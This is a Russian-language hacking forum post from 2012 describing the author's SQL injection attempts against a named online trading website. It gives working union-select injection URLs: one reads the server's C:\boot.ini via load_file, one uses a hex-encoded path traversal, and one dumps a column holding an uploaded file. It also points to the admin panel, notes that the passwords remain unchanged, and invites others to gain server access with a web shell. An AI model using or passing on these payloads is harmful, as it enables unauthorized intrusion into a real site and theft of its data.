06.04.2012, 01:55
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Так и не побежденный мною сайт.
Как мы видим, File_Priv = Y, но магические кавычки = ON
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+load_file(0x433a5c626f6f742e696e69)--[/COLOR][/COLOR]
Благодаря специфичной реализации сайта, при которой скрипты, составляющие основу юзабилити сайта, как физически присутствуют на сервере в виде отдельных файлов, так и полностью записаны в базу данных, имеется возможность провести sql-инъекцию в сочетании с php-инклудом(я впервые встретил такой наглядный пример, ввиду своего небольшого опыта)
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+0x2e2e2f2e2e2f696e646578--[/COLOR][/COLOR]
Это именно то, о чем вы подумали, залитое через админку, и попавшее в БД. Проинклудить это мне не удалось.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+file_upload+from+ps_daily_stock+limit+60,60--[/COLOR][/COLOR]
Саму админку, вы без проблем найдете по адресу
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/admin.php[/COLOR][/COLOR]
P.S. Сайт является аналогом нашего ололо форекса(онлайн-трейдинг), правил раздела не нарушает, админ поставлен в известность, но пароли от админки как были прежними, так ими и остались, что символизирует. По традиции - если кто-то сможет получить доступ к серверу с помощью веб-шелла, дайте знать. Спасибо. (рад избавиться от этого сайта, стоящего мне бессоные сутки ) |
|
|